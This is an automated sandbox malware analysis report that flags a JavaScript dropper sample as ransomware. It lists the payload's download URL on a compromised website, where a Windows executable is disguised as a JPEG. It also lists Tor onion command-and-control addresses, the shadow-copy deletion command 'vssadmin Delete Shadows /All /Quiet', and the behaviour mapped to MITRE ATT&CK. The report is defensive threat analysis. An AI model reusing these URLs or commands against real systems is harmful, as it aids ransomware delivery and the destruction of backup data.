Loading ...

Analysis Report 437#U0430.js

Overview

General Information

Joe Sandbox Version:25.0.0 Tiger's Eye
Analysis ID:108635
Start date:06.02.2019
Start time:12:38:46
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 10m 47s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:437#U0430.js
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Run name:without instrumentation
Number of analysed new started processes analysed:9
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.rans.troj.evad.winJS@8/4@12/4
EGA Information:
  • Successful, ratio: 75%
HDC Information:
  • Successful, ratio: 26.7% (good quality ratio 22.5%)
  • Quality average: 34.7%
  • Quality standard deviation: 27.7%
HCA Information:Failed
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .js
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, CompatTelRunner.exe
  • Execution Graph export aborted for target wscript.exe, PID 4300 because there are no executed function
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedDetection
Threshold1000 - 100Report FP / FNfalsemalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid AccountsScripting1Registry Run Keys / Start Folder1Process Injection111Masquerading1Input Capture1Process Discovery2Application Deployment SoftwareInput Capture1Data Encrypted2Data Obfuscation1
Replication Through Removable MediaService ExecutionPort MonitorsAccessibility FeaturesSoftware Packing1Network SniffingAccount Discovery1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Cryptographic Protocol1
Drive-by CompromiseWindows Management InstrumentationAccessibility FeaturesPath InterceptionDisabling Security Tools11Input CaptureSecurity Software Discovery41Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Non-Application Layer Protocol3
Exploit Public-Facing ApplicationScheduled TaskSystem FirmwareDLL Search Order HijackingProcess Injection111Credentials in FilesRemote System Discovery1Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol23
Spearphishing LinkCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessScripting1Account ManipulationSystem Network Configuration Discovery1Shared WebrootData StagedScheduled TransferConnection Proxy2
Spearphishing AttachmentGraphical User InterfaceModify Existing ServiceNew ServiceFile Deletion1Brute ForceFile and Directory Discovery1Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used Port
Spearphishing via ServiceScriptingPath InterceptionScheduled TaskObfuscated Files or Information3Two-Factor Authentication InterceptionSystem Information Discovery33Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used Port

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://a4ad4ip2xzclh6fd.onion/sys.phpnAvira URL Cloud: Label: malware
Multi AV Scanner detection for dropped fileShow sources
Source: C:\ProgramData\Windows\csrss.exevirustotal: Detection: 22%Perma Link
Source: C:\Users\CRAIGH~1\AppData\Local\Temp\radE040D.tmpvirustotal: Detection: 22%Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G7QTC28F\messg[1].jpgvirustotal: Detection: 22%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: 437#U0430.jsvirustotal: Detection: 14%Perma Link
Antivirus detection for unpacked fileShow sources
Source: 4.2.radE040D.tmp.400000.0.unpackAvira: Label: TR/Crypt.FKM.Gen
Source: 5.2.csrss.exe.2760000.2.unpackAvira: Label: TR/Crypt.FKM.Gen
Source: 8.2.csrss.exe.2860000.2.unpackAvira: Label: TR/Crypt.FKM.Gen
Source: 8.2.csrss.exe.400000.0.unpackAvira: Label: TR/Crypt.FKM.Gen
Source: 4.2.radE040D.tmp.24b0000.2.unpackAvira: Label: TR/Crypt.FKM.Gen
Source: 5.2.csrss.exe.400000.0.unpackAvira: Label: TR/Crypt.FKM.Gen

Cryptography:

barindex
Public key (encryption) foundShow sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: -----BEGIN PUBLIC KEY-----4_2_0043D92E
Source: radE040D.tmpBinary or memory string: -----BEGIN PUBLIC KEY-----

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_00416D6D _memset,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,4_2_00416D6D
Contains functionality to query local drivesShow sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_00416AEC _memset,_memset,GetLogicalDriveStringsW,GetSystemDirectoryW,GetDriveTypeW,GetDriveTypeW,4_2_00416AEC

Networking:

barindex
Downloads files with wrong headers with respect to MIME Content-TypeShow sources
Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Wed, 06 Feb 2019 11:39:40 GMT Server: Apache Last-Modified: Wed, 06 Feb 2019 11:05:06 GMT ETag: "17dec8-58137b2cf3f90" Accept-Ranges: bytes Content-Length: 1564360 Keep-Alive: timeout=2, max=100 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 28 b8 5a 5c 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 52 01 00 00 80 16 00 00 00 00 00 e0 59 01 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 20 00 00 02 00 00 3f 16 18 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
Found Tor onion addressShow sources
Source: radE040D.tmp, 00000004.00000002.7965481625.0000000003690000.00000004.sdmpString found in binary or memory: http://cryptsen7fo43rr6.onion/
Source: radE040D.tmp, 00000004.00000002.7983444516.00000000039D0000.00000004.sdmpString found in binary or memory: http://a4ad4ip2xzclh6fd.onion/sys.php
Source: radE040D.tmp, 00000004.00000002.7983444516.00000000039D0000.00000004.sdmpString found in binary or memory: http://a4ad4ip2xzclh6fd.onion/sys.phpn\\YN
May check the online IP address of the machineShow sources
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatismyipaddress.com
Source: unknownDNS query: name: whatsmyip.net
Source: unknownDNS query: name: whatsmyip.net
Source: unknownDNS query: name: whatsmyip.net
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 194.109.206.212
Source: unknownTCP traffic detected without corresponding DNS query: 194.109.206.212
Source: unknownTCP traffic detected without corresponding DNS query: 194.109.206.212
Source: unknownTCP traffic detected without corresponding DNS query: 208.83.223.34
Source: unknownTCP traffic detected without corresponding DNS query: 208.83.223.34
Source: unknownTCP traffic detected without corresponding DNS query: 208.83.223.34
Downloads executable code via HTTPShow sources
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 06 Feb 2019 11:39:40 GMTServer: ApacheLast-Modified: Wed, 06 Feb 2019 11:05:06 GMTETag: "17dec8-58137b2cf3f90"Accept-Ranges: bytesContent-Length: 1564360Keep-Alive: timeout=2, max=100Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 28 b8 5a 5c 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 52 01 00 00 80 16 00 00 00 00 00 e0 59 01 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 20 00 00 02 00 00 3f 16 18 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00
IP address seen in connection with other malwareShow sources
Source: Joe Sandbox ViewIP Address: 194.109.206.212 194.109.206.212
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: DREAMHOST-AS-NewDreamNetworkLLCUS DREAMHOST-AS-NewDreamNetworkLLCUS
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: GET /wp-content/themes/asteria-lite/css/messg.jpg HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.ri-photo.comConnection: Keep-Alive
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /wp-content/themes/asteria-lite/css/messg.jpg HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.ri-photo.comConnection: Keep-Alive
Found strings which match to known social media urlsShow sources
Source: radE040D.tmp, 00000004.00000002.7898564154.000000000281B000.00000004.sdmp, csrss.exe, 00000005.00000002.6829010099.0000000002AEB000.00000004.sdmp, csrss.exe, 00000008.00000002.6849219741.0000000002CEB000.00000004.sdmpString found in binary or memory: ww.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)
Source: radE040D.tmp, 00000004.00000002.7898564154.000000000281B000.00000004.sdmpString found in binary or memory: ww.mit.edu,www.yahoo.com,www.slashdot.orgur equals www.yahoo.com (Yahoo)
Source: csrss.exeString found in binary or memory: www.google.com,www.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)
Source: radE040D.tmp, 00000004.00000003.7126538222.0000000003154000.00000004.sdmp, csrss.exe, 00000005.00000002.6824499754.0000000002A12000.00000004.sdmp, csrss.exe, 00000008.00000002.6848650618.0000000002C12000.00000004.sdmpString found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)
Source: radE040D.tmp, 00000004.00000002.7940768557.00000000030E0000.00000004.sdmpString found in binary or memory: www.yahoo.comh equals www.yahoo.com (Yahoo)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: www.ri-photo.com
Urls found in memory or binary dataShow sources
Source: radE040D.tmp, 00000004.00000002.7983444516.00000000039D0000.00000004.sdmpString found in binary or memory: http://a4ad4ip2xzclh6fd.onion/sys.php
Source: radE040D.tmp, 00000004.00000002.7983444516.00000000039D0000.00000004.sdmpString found in binary or memory: http://a4ad4ip2xzclh6fd.onion/sys.phpn
Source: radE040D.tmp, 00000004.00000002.7743395847.00000000005E5000.00000040.sdmp, csrss.exe, 00000005.00000001.6684414722.00000000005E5000.00000040.sdmp, csrss.exe, 00000008.00000001.6776620077.00000000005E5000.00000040.sdmpString found in binary or memory: http://a4ad4ip2xzclh6fd.onionreg.phpprog.phperr.phpcmd.phpsys.phpshd.phpmail.php?&v=b=i=k=ss=e=c=f=s
Source: radE040D.tmp, 00000004.00000002.7965481625.0000000003690000.00000004.sdmpString found in binary or memory: http://cryptsen7fo43rr6.onion.cab/
Source: radE040D.tmp, 00000004.00000002.7965481625.0000000003690000.00000004.sdmpString found in binary or memory: http://cryptsen7fo43rr6.onion.cab/plic
Source: radE040D.tmp, 00000004.00000002.7942486928.000000000310A000.00000004.sdmpString found in binary or memory: http://cryptsen7fo43rr6.onion.cab/xmr
Source: radE040D.tmp, 00000004.00000002.7965481625.0000000003690000.00000004.sdmpString found in binary or memory: http://cryptsen7fo43rr6.onion.to/
Source: radE040D.tmp, 00000004.00000002.7965481625.0000000003690000.00000004.sdmpString found in binary or memory: http://cryptsen7fo43rr6.onion/
Source: radE040D.tmp, csrss.exe, 00000005.00000001.6684414722.00000000005E5000.00000040.sdmp, csrss.exe, 00000008.00000001.6776620077.00000000005E5000.00000040.sdmpString found in binary or memory: http://whatismyipaddress.com/
Source: radE040D.tmp, 00000004.00000002.7743395847.00000000005E5000.00000040.sdmp, csrss.exe, 00000005.00000001.6684414722.00000000005E5000.00000040.sdmp, csrss.exe, 00000008.00000001.6776620077.00000000005E5000.00000040.sdmpString found in binary or memory: http://whatismyipaddress.com///whatismyipaddress.com/ip/Click
Source: csrss.exe, 00000008.00000001.6776620077.00000000005E5000.00000040.sdmpString found in binary or memory: http://whatsmyip.net/
Source: csrss.exeString found in binary or memory: http://www.openssl.org/support/faq.html
Source: radE040D.tmp, 00000004.00000002.7685435280.0000000000400000.00000040.sdmp, csrss.exe, 00000005.00000001.6682682927.000000000056F000.00000040.sdmp, csrss.exe, 00000008.00000002.6842930052.0000000000400000.00000040.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html.
Source: wscript.exe, 00000000.00000003.6523724004.0000000005292000.00000004.sdmp, wscript.exe, 00000000.00000003.6481463686.0000000004D4E000.00000004.sdmpString found in binary or memory: http://www.ri-photo.com/wp-content/themes/asteria-lite/css/messg.jpg
Source: wscript.exe, 00000000.00000003.6523724004.0000000005292000.00000004.sdmpString found in binary or memory: http://www.ri-photo.com/wp-content/themes/asteria-lite/css/messg.jpg&v
Source: csrss.exe, csrss.exe, 00000008.00000002.6842930052.0000000000400000.00000040.sdmpString found in binary or memory: https://www.torproject.org/
Source: radE040D.tmp, 00000004.00000002.7942486928.000000000310A000.00000004.sdmpString found in binary or memory: https://www.torproject.org/download/download-easy.html.en
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)Show sources
Source: csrss.exe, 00000005.00000002.6800250245.0000000000A00000.00000004.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionalty to change the wallpaperShow sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_0040AC3A __EH_prolog,_memset,SystemParametersInfoW,SystemParametersInfoW,4_2_0040AC3A
Deletes shadow drive data (may be related to ransomware)Show sources
Source: radE040D.tmp, 00000004.00000002.7743395847.00000000005E5000.00000040.sdmpBinary or memory string: vssadmin.exediskshadow.exeList ShadowsDelete Shadows /All /QuietDELETE SHADOWS ALLrunas/s ROOT\CIMV2WQLAVAST
Source: csrss.exe, 00000005.00000001.6684414722.00000000005E5000.00000040.sdmpBinary or memory string: vssadmin.exediskshadow.exeList ShadowsDelete Shadows /All /QuietDELETE SHADOWS ALLrunas/s ROOT\CIMV2WQLAVAST
Source: csrss.exe, 00000008.00000001.6776620077.00000000005E5000.00000040.sdmpBinary or memory string: vssadmin.exediskshadow.exeList ShadowsDelete Shadows /All /QuietDELETE SHADOWS ALLrunas/s ROOT\CIMV2WQLAVAST

System Summary:

barindex
Contains functionality to communicate with device driversShow sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_00417871: CreateFileW,DeviceIoControl,CloseHandle,4_2_00417871
Creates mutexesShow sources
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3232:120:WilError_01
Detected potential crypto functionShow sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_00416D6D4_2_00416D6D
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_0041D2114_2_0041D211
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_004133754_2_00413375
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_004095194_2_00409519
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_00405D994_2_00405D99
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_00417EB54_2_00417EB5
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_005700E04_2_005700E0
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_0046216A4_2_0046216A
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_005782174_2_00578217
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_004182F74_2_004182F7
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_005702E04_2_005702E0
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_0047C2954_2_0047C295
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_004585914_2_00458591
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_005786004_2_00578600
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_004126994_2_00412699
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_005728864_2_00572886
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_004249304_2_00424930
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_0055CA564_2_0055CA56
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_00448BF04_2_00448BF0
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_0040AC3A4_2_0040AC3A
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_00412CBF4_2_00412CBF
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_0055AD614_2_0055AD61
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_00574D004_2_00574D00
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_00414D814_2_00414D81
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_00478E5B4_2_00478E5B
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_00572EF94_2_00572EF9
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_005731804_2_00573180
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_004411B74_2_004411B7
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_005712304_2_00571230
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_005752904_2_00575290
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_005594804_2_00559480
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_005756D74_2_005756D7
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_005716C04_2_005716C0
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_005737C04_2_005737C0
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_0041B9C04_2_0041B9C0
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_005719804_2_00571980
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_0054D9A04_2_0054D9A0
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_00407B254_2_00407B25
Dropped file seen in connection with other malwareShow sources
Source: Joe Sandbox ViewDropped File: C:\ProgramData\Windows\csrss.exe F8F4DE2F06C6C00B170ED88B4ED8D68DD01B48745F70FFCE38407B82AE05C0E7
Source: Joe Sandbox ViewDropped File: C:\Users\CRAIGH~1\AppData\Local\Temp\radE040D.tmp F8F4DE2F06C6C00B170ED88B4ED8D68DD01B48745F70FFCE38407B82AE05C0E7
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G7QTC28F\messg[1].jpg F8F4DE2F06C6C00B170ED88B4ED8D68DD01B48745F70FFCE38407B82AE05C0E7
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: String function: 005501C8 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: String function: 004427B6 appears 88 times
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: String function: 0040383F appears 83 times
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: String function: 0056F5DC appears 197 times
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: String function: 0055E5C0 appears 163 times
Java / VBScript file with very long strings (likely obfuscated code)Show sources
Source: 437#U0430.jsInitial sample: Strings found which are bigger than 50
Reads the hosts fileShow sources
Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Tries to load missing DLLsShow sources
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpSection loaded: wow64log.dllJump to behavior
Source: C:\ProgramData\Windows\csrss.exeSection loaded: wow64log.dllJump to behavior
Source: C:\ProgramData\Windows\csrss.exeSection loaded: wow64log.dllJump to behavior
Classification labelShow sources
Source: classification engineClassification label: mal100.rans.troj.evad.winJS@8/4@12/4
Contains functionality to enum processes or threadsShow sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_00449089 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,_memset,GetTickCount,GetTickCount,Heap32ListFirst,_memset,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,Process32Next,GetTickCount,GetTickCount,Thread32First,Thread32Next,GetTickCount,GetTickCount,Module32First,Module32Next,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,4_2_00449089
Creates files inside the user directoryShow sources
Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G7QTC28F\messg[1].jpgJump to behavior
Creates temporary filesShow sources
Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\CRAIGH~1\AppData\Local\Temp\radE040D.tmpJump to behavior
Reads ini filesShow sources
Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\SysWOW64\wscript.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: 437#U0430.jsvirustotal: Detection: 14%
Sample might require command line arguments (.Net)Show sources
Source: csrss.exeString found in binary or memory: 7300e4301afb0f11bd3e3bbb680dcd5a4f16132b src/or/tor_main.c babb5c60712b93b4aec373dbb16184bfa538c647 src/or/addressmap.c 1c2e8b3d7f6d19f4c3fecef13d8e29ea45d69028 src/or/buffers.c 52fbb8124bfb04bb83d44f1bbaaa2a1ebfa42870 src/or/channel.c 050ce52841624546a391
Source: csrss.exeString found in binary or memory: ip-address
Source: csrss.exeString found in binary or memory: dir-address
Source: csrss.exeString found in binary or memory: or-address %s:%d
Source: csrss.exeString found in binary or memory: or-address
Source: csrss.exeString found in binary or memory: cp+(end-start_of_annotations) == router->cache_info.signed_descriptor_body+len
Source: csrss.exeString found in binary or memory: id-cmc-addExtensions
Source: csrss.exeString found in binary or memory: 68e src/or/addressmap.h fc122cd5462d0445cb668278744dd8778472cf54 src/or/buffers.h 03bcf0ecb460f7814ab484deb6f638f727704b94 src/or/channel.h 52340d597aa7c6cc5500f654f46733a4e577905a src/or/channeltls.h ff3a5693416ccf243f608a7bb943a078418c16d8 src/or/circpa
Source: csrss.exeString found in binary or memory: accounting/interval-start
Source: csrss.exeString found in binary or memory: .in-addr.arpa
Source: csrss.exeString found in binary or memory: X-Your-Address-Is:
Source: csrss.exeString found in binary or memory: X-Your-Address-Is: %s
Source: csrss.exeString found in binary or memory: cffd2d9eef71f1ae5f7eb4e16aa56b728abe65aa src/common/address.h 3890e58a3754bc0de32e7cf38de8a790c2c282af src/common/backtrace.h 947ef902f15f556f176b1115f09d9966e377347d src/common/aes.h 2ad59cee80471c42536e66e24e73a8948e345dcf src/common/ciphers.inc ceaa37cf
Source: csrss.exeString found in binary or memory: introduction-point %s ip-address %s onion-port %d onion-key %sservice-key %s
Source: csrss.exeString found in binary or memory: %d.%d.%d.%d.in-addr.arpa
Source: csrss.exeString found in binary or memory: --install
Source: csrss.exeString found in binary or memory: -install
Source: csrss.exeString found in binary or memory: set-addPolicy
Source: csrss.exeString found in binary or memory: 7300e4301afb0f11bd3e3bbb680dcd5a4f16132b src/or/tor_main.c babb5c60712b93b4aec373dbb16184bfa538c647 src/or/addressmap.c 1c2e8b3d7f6d19f4c3fecef13d8e29ea45d69028 src/or/buffers.c 52fbb8124bfb04bb83d44f1bbaaa2a1ebfa42870 src/or/channel.c 050ce52841624546a391
Source: csrss.exeString found in binary or memory: ip-address
Source: csrss.exeString found in binary or memory: dir-address
Source: csrss.exeString found in binary or memory: or-address %s:%d
Source: csrss.exeString found in binary or memory: or-address
Source: csrss.exeString found in binary or memory: cp+(end-start_of_annotations) == router->cache_info.signed_descriptor_body+len
